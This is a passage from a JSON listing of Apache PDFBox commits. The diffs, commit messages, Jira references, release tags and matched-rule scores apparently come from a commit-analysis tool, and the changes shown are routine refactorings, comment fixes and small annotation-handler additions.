sin_a;", + "+ double xs = cx + rx * cosA;", + "+ double ys = cy + ry * sinA;", + " if (out != null)", + "@@ -659,8 +668,8 @@ class CloudyBorder", + " double bcp = 1.333333333 * (1 - Math.cos((endAng - startAng) / 2.0)) / denom;", + "- double p1x = cx + rx * (cos_a - bcp * sin_a);", + "- double p1y = cy + ry * (sin_a + bcp * cos_a);", + "- double p2x = cx + rx * (cos_b + bcp * sin_b);", + "- double p2y = cy + ry * (sin_b - bcp * cos_b);", + "- double p3x = cx + rx * cos_b;", + "- double p3y = cy + ry * sin_b;", + "+ double p1x = cx + rx * (cosA - bcp * sinA);", + "+ double p1y = cy + ry * (sinA + bcp * cosA);", + "+ double p2x = cx + rx * (cosB + bcp * sinB);", + "+ double p2y = cy + ry * (sinB - bcp * cosB);", + "+ double p3x = cx + rx * cosB;", + "+ double p3y = cy + ry * sinB;", + "@@ -668,4 +677,4 @@ class CloudyBorder", + " {", + "- double xs = cx + rx * cos_a;", + "- double ys = cy + ry * sin_a;", + "+ double xs = cx + rx * cosA;", + "+ double ys = cy + ry * sinA;", + " if (out != null)", + "@@ -714,2 +723,4 @@ class CloudyBorder", + " // flattened. SEG_CLOSE can be ignored.", + "+ default:", + "+ break;", + " }", + "@@ -740,4 +751,8 @@ class CloudyBorder", + "- double left = leftOrig, bottom = bottomOrig, right = rightOrig, top = topOrig;", + "- double width = right - left, height = top - bottom;", + "+ double left = leftOrig;", + "+ double bottom = bottomOrig;", + "+ double right = rightOrig;", + "+ double top = topOrig;", + "+ double width = right - left;", + "+ double height = top - bottom;", + " double cloudRadius = getEllipseCloudRadius();", + "@@ -843,3 +858,4 @@ class CloudyBorder", + " Point2D.Double p2 = flatPolygon[i + 1];", + "- double dx = p2.x - p1.x, dy = p2.y - p1.y;", + "+ double dx = p2.x - p1.x;", + "+ double dy = p2.y - p1.y;", + " double length = p1.distance(p2);", + "@@ -852,3 +868,4 @@ class CloudyBorder", + " {", + "- double cos = cosine(dx, length), sin = sine(dy, length);", + "+ double cos = cosine(dx, length);", + "+ double sin = sine(dy, length);", + " double d = curlAdvance - lengthRemain;", + "@@ -888,3 +905,4 @@ class CloudyBorder", + " numPoints = centerPointsIndex;", + "- double anglePrev = 0, alphaPrev = 0;", + "+ double anglePrev = 0;", + "+ double alphaPrev = 0;" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/CloudyBorder.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-3353": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-3353", + "relevance": 2 + } + ] + }, + { + "commit_id": "e4b704f7bd8eba6c6fcd90ac261844b920cc135e", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1525924129, + "hunks": 4, + "message": "PDFBOX-4068: fix - use PDAppearanceContentStream class git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1831299 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java", + "index cef278c71..a0146bccf 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java", + "@@ -23,3 +23,2 @@ import org.apache.commons.logging.Log;", + " import org.apache.commons.logging.LogFactory;", + "-import org.apache.pdfbox.pdmodel.PDAbstractContentStream;", + " import org.apache.pdfbox.pdmodel.common.PDRectangle;", + "@@ -405,3 +404,3 @@ public class PDLineAppearanceHandler extends PDAbstractAppearanceHandler", + " */", + "- private void drawArrow(PDAbstractContentStream cs, float x, float y, float len) throws IOException", + "+ private void drawArrow(PDAppearanceContentStream cs, float x, float y, float len) throws IOException", + " {", + "@@ -426,3 +425,3 @@ public class PDLineAppearanceHandler extends PDAbstractAppearanceHandler", + " */", + "- private void drawDiamond(PDAbstractContentStream cs, float x, float y, float r) throws IOException", + "+ private void drawDiamond(PDAppearanceContentStream cs, float x, float y, float r) throws IOException", + " {", + "@@ -445,3 +444,3 @@ public class PDLineAppearanceHandler extends PDAbstractAppearanceHandler", + " */", + "- private void addCircle(PDAbstractContentStream cs, float x, float y, float r) throws IOException", + "+ private void addCircle(PDAppearanceContentStream cs, float x, float y, float r) throws IOException", + " {" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4068": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4068", + "relevance": 2 + } + ] + }, + { + "commit_id": "56eb8ac27d9a8319fefa6c13c8786f125c3f807b", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1523283779, + "hunks": 1, + "message": "PDFBOX-4184: complete comment git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1828724 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java", + "index 475437112..28210f3db 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java", + "@@ -188,3 +188,3 @@ public final class LosslessFactory", + " int dataType = alphaRaster.getDataBuffer().getDataType();", + "- // for 16 it images we need to ", + "+ // for 16 bit images divide by 256 ", + " int shift = dataType == DataBuffer.TYPE_USHORT ? 8 : 0;" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4184": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4184", + "relevance": 2 + } + ] + }, + { + "commit_id": "7f81b4fbf2512cd572e7e2df82b6e414f79fa470", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1531201507, + "hunks": 1, + "message": "PDFBOX-4256: enhance javadoc comment git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1835516 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PDButton.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PDButton.java", + "index 8840fec86..5f31c0667 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PDButton.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PDButton.java", + "@@ -124,4 +124,6 @@ public abstract class PDButton extends PDTerminalField", + " /**", + "- * Returns the selected value. May be empty if NoToggleToOff is set but there is no value", + "- * selected.", + "+ * Returns the selected value.", + "+ * ", + "+ *

    Off is the default value which will also be returned if the", + "+ * value hasn't been set at all.", + " * " + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PDButton.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4256": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4256", + "relevance": 2 + } + ] + }, + { + "commit_id": "09a99a03f198edcac089ffd66ca72fa71e64dc7b", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1532463535, + "hunks": 2, + "message": "PDFBOX-4271: use sha512 instead of md5 git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1836583 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/preflight/pom.xml b/preflight/pom.xml", + "index 51087ebef..17de17e1c 100644", + "--- a/preflight/pom.xml", + "+++ b/preflight/pom.xml", + "@@ -124,3 +124,3 @@", + " ${project.build.directory}/pdfs", + "- 9f129c834bc6f9f8dabad4491c4c10ec", + "+ 66bf4ad470b36079c1e0ceca4438053f32649f964fb1de5cd88babce36c5afc0ba6fa7880bc1c9aac791df872cdfc8dc9851bfd3c75ae96786edd8fac61193ae", + " ", + "@@ -138,3 +138,3 @@", + " ${project.build.directory}/pdfs", + "- d8fccb2fea540ab49bef237f3579546b", + "+ a6efe70574dcde3628271fc1d7aa32cc00095334aa9415e5ebfb96cc20e0f79edd040c0290d5a76b4ced4c6a4343ba4af9567bf12eb7cfe3ec70f1a43202c231", + " " + ], + "changed_files": [ + "preflight/pom.xml" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4271": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4271", + "relevance": 2 + } + ] + }, + { + "commit_id": "d88e2be7880de920022f63a8b03078d9c1612d60", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1530813924, + "hunks": 3, + "message": "PDFBOX-3353: improve javadoc, remove double code git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1835167 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDAbstractAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDAbstractAppearanceHandler.java", + "index 8ac1250f8..2be86de09 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDAbstractAppearanceHandler.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDAbstractAppearanceHandler.java", + "@@ -119,5 +119,5 @@ public abstract class PDAbstractAppearanceHandler implements PDAppearanceHandler", + " *

    ", + "- * This will get the annotations normal appearance content stream,", + "- * to 'draw' to.", + "- * ", + "+ * This will get the annotations normal appearance content stream, to 'draw' to. It will be", + "+ * uncompressed.", + "+ *", + " * @return the appearance entry representing the normal appearance.", + "@@ -127,4 +127,3 @@ public abstract class PDAbstractAppearanceHandler implements PDAppearanceHandler", + " {", + "- PDAppearanceEntry appearanceEntry = getNormalAppearance();", + "- return getAppearanceEntryAsContentStream(appearanceEntry, false);", + "+ return getNormalAppearanceAsContentStream(false);", + " }", + "@@ -135,4 +134,3 @@ public abstract class PDAbstractAppearanceHandler implements PDAppearanceHandler", + " *

    ", + "- * This will get the annotations normal appearance content stream,", + "- * to 'draw' to.", + "+ * This will get the annotations normal appearance content stream, to 'draw' to.", + " * " + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDAbstractAppearanceHandler.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-3353": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-3353", + "relevance": 2 + } + ] + }, + { + "commit_id": "e228c77b43cfac041d65218f47987ec323efc4b4", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1523713689, + "hunks": 2, + "message": "PDFBOX-3809: return early for empty field list; remove rendering test for flatten of specific fields git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1829139 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PDAcroForm.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PDAcroForm.java", + "index 5d47308fa..cb5e01c7c 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PDAcroForm.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PDAcroForm.java", + "@@ -252,2 +252,7 @@ public final class PDAcroForm implements COSObjectable", + " {", + "+ // Nothing to flatten if there are no fields provided", + "+ if (fields.isEmpty()) {", + "+ return;", + "+ }", + "+ ", + " // for dynamic XFA forms there is no flatten as this would mean to do a rendering", + "@@ -284,3 +289,3 @@ public final class PDAcroForm implements COSObjectable", + " for (PDAnnotation annotation: page.getAnnotations())", + "- { ", + "+ { ", + " if (widgetsForPageMap != null && widgetsForPageMap.get(annotation.getCOSObject()) == null)" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PDAcroForm.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-3809": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-3809", + "relevance": 2 + } + ] + }, + { + "commit_id": "f4be122ce9b5b0b2fe41a8b01dcddf06eab48684", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1524771375, + "hunks": 1, + "message": "PDFBOX-3353: add //TODO with concept for line endings git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1830259 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolygonAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolygonAppearanceHandler.java", + "index b07d3823c..c7ad9846e 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolygonAppearanceHandler.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolygonAppearanceHandler.java", + "@@ -160,2 +160,14 @@ public class PDPolygonAppearanceHandler extends PDAbstractAppearanceHandler", + "+ //TODO line endings (LE) are missing", + "+ // How it could be done by reusing some of the code from ", + "+ // the Line and StrikeOut handlers", + "+ // 1) if the LE is contained in SHORT_STYLES, ", + "+ // shorten the first + last arms with \"this weird old trick\"", + "+ // used in the StrikeOut handler", + "+ // and paint", + "+ // 2) do a transform so that first and last arms are imagined flat", + "+ // (like in Line handler)", + "+ // 3) refactor + reuse the line handler code that draws the ending shapes", + "+ // the alternative would be to apply the transform to the LE shapes directly,", + "+ // which would be more work and produce code difficult to understand", + " contentStream.drawShape(lineWidth, hasStroke, hasBackground);" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolygonAppearanceHandler.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-3353": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-3353", + "relevance": 2 + } + ] + }, + { + "commit_id": "01f4fa07020498b4cecfdfbe4642d339a5a26152", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1530641778, + "hunks": 2, + "message": "PDFBOX-3353: correct padding git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1835009 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDStrikeoutAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDStrikeoutAppearanceHandler.java", + "index 052f98b61..a22d3def9 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDStrikeoutAppearanceHandler.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDStrikeoutAppearanceHandler.java", + "@@ -87,4 +87,4 @@ public class PDStrikeoutAppearanceHandler extends PDAbstractAppearanceHandler", + " rect.setLowerLeftY(Math.min(minY - ab.width / 2, rect.getLowerLeftY()));", + "- rect.setUpperRightX(Math.max(maxX + ab.width, rect.getUpperRightX()));", + "- rect.setUpperRightY(Math.max(maxY + ab.width, rect.getUpperRightY()));", + "+ rect.setUpperRightX(Math.max(maxX + ab.width / 2, rect.getUpperRightX()));", + "+ rect.setUpperRightY(Math.max(maxY + ab.width / 2, rect.getUpperRightY()));", + " annotation.setRectangle(rect);", + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDUnderlineAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDUnderlineAppearanceHandler.java", + "index 48363df3b..6556ee589 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDUnderlineAppearanceHandler.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDUnderlineAppearanceHandler.java", + "@@ -88,4 +88,4 @@ public class PDUnderlineAppearanceHandler extends PDAbstractAppearanceHandler", + " rect.setLowerLeftY(Math.min(minY - ab.width / 2, rect.getLowerLeftY()));", + "- rect.setUpperRightX(Math.max(maxX + ab.width, rect.getUpperRightX()));", + "- rect.setUpperRightY(Math.max(maxY + ab.width, rect.getUpperRightY()));", + "+ rect.setUpperRightX(Math.max(maxX + ab.width / 2, rect.getUpperRightX()));", + "+ rect.setUpperRightY(Math.max(maxY + ab.width / 2, rect.getUpperRightY()));", + " annotation.setRectangle(rect);" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDStrikeoutAppearanceHandler.java", + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDUnderlineAppearanceHandler.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-3353": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-3353", + "relevance": 2 + } + ] + }, + { + "commit_id": "26cf2ec688c32cb9cf005fcae612bdba0873bfa1", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1524387071, + "hunks": 4, + "message": "PDFBOX-4189: reorder constructor and fields, use better way to turn off KCMS git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1829764 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/examples/src/main/java/org/apache/pdfbox/examples/pdmodel/BengaliPdfGenerationHelloWorld.java b/examples/src/main/java/org/apache/pdfbox/examples/pdmodel/BengaliPdfGenerationHelloWorld.java", + "index 915cd09a4..e1246f380 100644", + "--- a/examples/src/main/java/org/apache/pdfbox/examples/pdmodel/BengaliPdfGenerationHelloWorld.java", + "+++ b/examples/src/main/java/org/apache/pdfbox/examples/pdmodel/BengaliPdfGenerationHelloWorld.java", + "@@ -41,6 +41,2 @@ public class BengaliPdfGenerationHelloWorld", + " {", + "- private BengaliPdfGenerationHelloWorld()", + "- { ", + "- }", + "-", + " /**", + "@@ -59,6 +55,16 @@ public class BengaliPdfGenerationHelloWorld", + " {", + "- if (System.getProperty(\"java.version\").startsWith(\"1.8\"))", + "+ try", + " {", + "+ // turns off log info about using KCMS (faster than LCMS) if available", + "+ Class.forName(\"sun.java2d.cmm.kcms.KcmsServiceProvider\");", + " System.setProperty(\"sun.java2d.cmm\", \"sun.java2d.cmm.kcms.KcmsServiceProvider\");", + " }", + "+ catch (ClassNotFoundException e)", + "+ {", + "+ // ignore", + "+ }", + "+ }", + "+", + "+ private BengaliPdfGenerationHelloWorld()", + "+ { ", + " }" + ], + "changed_files": [ + "examples/src/main/java/org/apache/pdfbox/examples/pdmodel/BengaliPdfGenerationHelloWorld.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4189": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4189", + "relevance": 2 + } + ] + }, + { + "commit_id": "f4abb495db9b850ca0db27984e26d7974cb7ef23", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1523898449, + "hunks": 0, + "message": "[maven-release-plugin] copy for tag 1.8.14 git-svn-id: https://svn.apache.org/repos/asf/pdfbox/tags/1.8.14@1829299 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [], + "changed_files": [], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "a48b3adb3386a3e9d9c93f7341aeed113cc95333" + ] + ], + "tags": [ + "1.8.14" + ], + "matched_rules": [ + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + } + ] + }, + { + "commit_id": "489ad16fcd0de7d959140cbbd8e52337468e0210", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1524593000, + "hunks": 4, + "message": "PDFBOX-3353: improve //TODO comment, remove content stream parts that have no effect git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1830017 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDCaretAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDCaretAppearanceHandler.java", + "index a1610fb33..3422cef96 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDCaretAppearanceHandler.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDCaretAppearanceHandler.java", + "@@ -50,6 +50,8 @@ public class PDCaretAppearanceHandler extends PDAbstractAppearanceHandler", + " {", + "- float lineWidth = 1f;", + "- //TODO Adobe creates the /RD entry, but it is unclear how it", + "- // gets the (identical) numbers. The numbers from there are then substracted/added from /BBox", + "- // and used in the translation in the matrix and also for the line width.", + "+ //TODO Adobe creates the /RD entry with a number that is decided by dividing the height by 10,", + "+ // with a maximum result of 5. That number is then substracted from the /BBox", + "+ // values and used in the translation values in the matrix and also for the line width", + "+ // (not used here because it has no effect).", + "+ // Currently, the rendering difference between our content stream and the one from Adobe", + "+ // is minimal, about one pixel line at the bottom.", + "@@ -61,3 +63,2 @@ public class PDCaretAppearanceHandler extends PDAbstractAppearanceHandler", + " contentStream.setStrokingColor(getColor());", + "- contentStream.setLineWidth(lineWidth);", + " contentStream.setNonStrokingColor(getColor());", + "@@ -79,7 +80,6 @@ public class PDCaretAppearanceHandler extends PDAbstractAppearanceHandler", + " rect.getWidth(), 0);", + "- // closeAndFillAndStroke() would bring a thicker \"thin top\" shape.", + " contentStream.closePath();", + " contentStream.fill();", + "- contentStream.stroke();", + "- //TODO test whether the stroke() and setLineWidth() calls have any effect at all.", + "+ // Adobe has an additional stroke, but it has no effect", + "+ // because fill \"consumes\" the path.", + " }" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDCaretAppearanceHandler.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-3353": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-3353", + "relevance": 2 + } + ] + }, + { + "commit_id": "bb6863f60089ea5587c182854bf8cf23611e80f5", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1524503622, + "hunks": 5, + "message": "PDFBOX-3353: add caret annotation handler git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1829909 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDCaretAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDCaretAppearanceHandler.java", + "index ef62e1301..a1610fb33 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDCaretAppearanceHandler.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDCaretAppearanceHandler.java", + "@@ -17,6 +17,15 @@ package org.apache.pdfbox.pdmodel.interactive.annotation.handlers;", + "+import java.io.IOException;", + " import org.apache.commons.logging.Log;", + " import org.apache.commons.logging.LogFactory;", + "+import org.apache.pdfbox.pdmodel.common.PDRectangle;", + " import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotation;", + "+import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotationCaret;", + "+import org.apache.pdfbox.pdmodel.interactive.annotation.PDAppearanceContentStream;", + "+/**", + "+ * Handler to generate the caret annotations appearance.", + "+ *", + "+ * @author Tilman Hausherr", + "+ */", + " public class PDCaretAppearanceHandler extends PDAbstractAppearanceHandler", + "@@ -41,3 +50,42 @@ public class PDCaretAppearanceHandler extends PDAbstractAppearanceHandler", + " {", + "- // TODO to be implemented", + "+ float lineWidth = 1f;", + "+ //TODO Adobe creates the /RD entry, but it is unclear how it", + "+ // gets the (identical) numbers. The numbers from there are then substracted/added from /BBox", + "+ // and used in the translation in the matrix and also for the line width.", + "+", + "+ try", + "+ {", + "+ PDAnnotationCaret annotation = (PDAnnotationCaret) getAnnotation();", + "+ try (PDAppearanceContentStream contentStream = getNormalAppearanceAsContentStream())", + "+ {", + "+ contentStream.setStrokingColor(getColor());", + "+ contentStream.setLineWidth(lineWidth);", + "+ contentStream.setNonStrokingColor(getColor());", + "+ ", + "+ handleOpacity(annotation.getConstantOpacity());", + "+", + "+ PDRectangle rect = getRectangle();", + "+ PDRectangle bbox = new PDRectangle(rect.getWidth(), rect.getHeight());", + "+ annotation.getNormalAppearanceStream().setBBox(bbox);", + "+", + "+ float halfX = rect.getWidth() / 2;", + "+ float halfY = rect.getHeight() / 2;", + "+ contentStream.moveTo(0, 0);", + "+ contentStream.curveTo(halfX, 0,", + "+ halfX, halfY, ", + "+ halfX, rect.getHeight());", + "+ contentStream.curveTo(halfX, halfY, ", + "+ halfX, 0,", + "+ rect.getWidth(), 0);", + "+ // closeAndFillAndStroke() would bring a thicker \"thin top\" shape.", + "+ contentStream.closePath();", + "+ contentStream.fill();", + "+ contentStream.stroke();", + "+ //TODO test whether the stroke() and setLineWidth() calls have any effect at all.", + "+ }", + "+ }", + "+ catch (IOException e)", + "+ {", + "+ LOG.error(e);", + "+ }", + " }", + "@@ -55,2 +103,2 @@ public class PDCaretAppearanceHandler extends PDAbstractAppearanceHandler", + " }", + "-}", + "+}", + "\\ No newline at end of file" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDCaretAppearanceHandler.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-3353": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-3353", + "relevance": 2 + } + ] + }, + { + "commit_id": "6cdd00dbf73466f1b2d8fae6f06df16da59911e1", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1528042161, + "hunks": 2, + 